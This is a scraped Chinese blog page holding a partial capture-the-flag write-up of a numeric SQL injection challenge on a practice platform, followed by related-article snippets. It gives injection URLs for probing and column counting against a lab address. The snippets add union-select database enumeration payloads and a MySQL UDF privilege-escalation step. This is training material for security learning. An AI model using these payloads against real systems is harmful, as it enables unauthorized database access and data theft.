安鸾SQL系列之数字字符串

最新推荐文章于 2023-08-24 16:20:27 发布
最新推荐文章于 2023-08-24 16:20:27 发布
阅读量1.8k 收藏
点赞数
分类专栏: Web安全 文章标签: web安全 安全 渗透测试 网络安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46318141/article/details/123917863
版权

声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
本文首发于 涂寐’s Blogs:安鸾SQL系列之数字字符串 | 涂寐's Blogs

  1. 1. SQL数字型GET注入01
  2. 2. SQL字符型注入

SQL数字型GET注入01

漏洞URL:http://47.103.94.191:8001/bug/sql_injection/sql_num.php

提示:flag在数据库里
# 测类型--数字型
http://47.103.94.191:8001/bug/sql_injection/sql_num.php?id=1 and 1=1&submit=submit
http://47.103.94.191:8001/bug/sql_injection/sql_num.php?id=1 and 1=2&submit=submit
# 测字段--3
http://47.103.94.191:8001/bug/sql_injection/sql_num.php?id=1 order by 3&submit=submit
http://47.103.94.191:8001/bug/sql_injection/sql_num.php?id=1 order by 4&submit=submit
# 获取当前所在数据库--dwvs

涂寐
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql数值注入和字符注入
十五年游戏主程转渗透之路
03-27 2338
mysql,注入流程
linux mysql udf 提权
ddr12231的博客
05-09 681
连接远程数据库 查看插件库路径 show variables like '%plugin%'; 写入udf库到插件目录: select unhex('7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000...
安鸾渗透实战平台wp(持续更新)
Delity的博客
05-13 6789
一、SQL注入 SQL数字GET注入01 漏洞URL:http://www.whalwl.top:8001/bug/sql_injection/sql_num.php 1’报错,输入-1返回正常,构造payload, 判断字段:显示位在第二位和第三位 -1 order by 3 # 爆库: -1 union select 1,database(),3 # 爆表: -1 union select 1,group_concat(table_name),3 from information_sch
安鸾渗透实战平台-SQL字符注入
qxx5203的博客
07-21 495
漏洞URLhttp//47.103.94.1918005//bug/sql_injection/sql_string.php?title=1&submit=submit。数据库列的信息id,,不是我们需要的内容。查找flag表下的列。
SQL 数字字符串互转
长发姑娘的博客
12-24 1万+
1. 数字字符串 -- 1. CONCAT 拼接,CONCAT 函数可以拼接多个值 SELECT CONCAT(123,'aa',456) AS str; -- 2. CAST 类转换,转字符串一定要用 CHAR,不能用 VARCHAR SELECT CAST(123 AS CHAR) AS str; 2. 字符串数字 -- 1. CAST 类转换 SELECT CAST('1...
sql获取某字符串中的数字部分的语句
12-15
SQL中,有时我们需要从一个包含混合字符字符串中提取出数字部分,这在处理包含混合数据类的字段时尤其有用。本话题将深入探讨如何利用SQL实现这一目标,特别是通过结合`PATINDEX`和`STUFF`这两个内置函数来...
SQL字符串以及数字常用操作汇总
09-10
SQL中,字符串数字操作是数据库查询和数据处理的核心部分。以下是对这些常用操作的详细解释和示例。 1. **STUFF函数**:这个函数用于从字符串中删除一个子串,并在相同位置插入另一个子串。例如,`STUFF('hi,...
Sql Server 字符串聚合函数
09-11
在标题和描述中提到的问题是,如何在SQL Server中聚合字符串。例如,有一个名为`AggregationTable`的表,包含`Id`和`Name`两个字段,`Id`字段表示分类标识,`Name`字段存储字符串。我们想要根据`Id`将相同`Id`下的...
sql 判断字符串中是否包含数字和字母的方法
12-15
本文将详细探讨如何使用SQL语句来判断一个字符串中是否包含数字和字母,以及相关的字符串处理技巧。 首先,我们要介绍的关键函数是`PATINDEX()`。这个函数在SQL Server中用于返回指定模式在目标字符串中首次出现的...
SQL数据分析之MySQL数字字符、日期函数-可用于where和select【精心整理】
Viewinfinitely的博客
05-22 1480
关于使用SQL进行数据处理和数据分析的MySQL其他常用函数,这些函数是非聚合函数,且可用于where和select,主要整理成数字方面、字符串方面和日期方面的函数。
sql语句将数字格式修改为字符
08-19 3640
使用grafana创建图表时,出现错误提示: Column metric must be of type UNKNOWN, TEXT, VARCHAR, CHAR. metric column name: metric type: INT4 but datatype is int64 意思是指准备作为metric的字段为数值类,不支持。 需要将选择的字段数值修改为字符格式使用。 方法一: select cast(字段 as varchar) from 表名 方法二: sel
SQL查询结果数字字符串,以及查询结果的的四舍五入
最新发布
jinjuana521的博客
08-24 2280
select ROUND(cast(sum(data_val) as char),2) from 表名 where 查询条件;select ROUND(cast(sum(data_val) as char)) from 表名 where 查询条件;select ROUND(sum(data_val),2) from 表名 where 查询条件;这样的查询出来的结果是数值,有时候不方便我们进行比对。
SQL数据库基础05-补】常见的数据类--• 数值类字符• 日期类
学无止境,勤则可达;志存高远,恒亦能成!
06-02 1708
文章目录常见的数据类一、整1.1 分类:1.2 特点:1.3 实操:二、小数2.1 分类2.2 特点:2.3 原则三、字符 char、varchar3.1 类四、日期4.1 分类:4.2 特点: 常见的数据类 数值: ​ 整 ​ 小数: ​ 定点数 ​ 浮点数 字符: ​ 较短的文本:char、varchar ​ 较长的文本:text、blob(较长的二进制数据) 日期: ​ 一、整 1.1 分类: tinyint、smallint
sql中将字符串数字转换成数字
wx13227855087的博客
08-27 4万+
SELECT CAST(id AS SIGNED) id FROM lis_yz ORDER BY id DESC SELECT CONVERT(id,SIGNED) id FROM lis_yz ORDER BY id SELECT id+0 id FROM lis_yz ORDER BY id ;
SQLserver 字符串数字问题
依然范特西
05-09 4万+
之前做个需求遇到字符串数字,遇到点问题和大家分享下。 我想对查询的结果集分组求和,本以为转换下数据类用聚合函数直接求和就完事了。就像下面这样 SELECT p.id, p.objno, p.objname, -- bt.projecttypename, bic.ratename, sum(convert(numeric(10,2),bic.ratevalue )), bic...
sql函数 数字转换成字符串
技术就是个纸老虎---为之,则难者亦易矣;不为,则易者亦难矣。
12-09 6052
<br />将数字转换成字符串,如果是整数类的话,可以使用str()函数直接来转换,不过用str函数不能转带有浮点数。<br />declare @score float;<br />set @score=1.6;<br />select str(@score);<br />输出结果是2。这明显是不对的。<br />所以更建议不要使用str函数,而使用convert和cast函数<br />这两个函数的语法<br />convert(目标类,要转换的数字);<br />cast(要转换的数字 as 目标
关于SQL Server中将数值类转换为字符串的问题
热门推荐
CSDN深蓝居
08-27 5万+
今天在把一些数据导入到SQL Server的时候遇到有个列被导入成float类,而我实际需要的是varchar类,所以要进行类转换,转换时遇到了一点问题,所以写这篇博客记录一下。 SQL Server中的数值类分为两种,一种是精确的数值类,具体的数据类有:bit、tinyint、smallint、int、bigint、smallmoney、money和decimal,这些数据类能够
安鸾sql字符02
07-28
- *1* [安鸾SQL系列数字字符串](https://blog.csdn.net/weixin_46318141/article/details/123917863)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值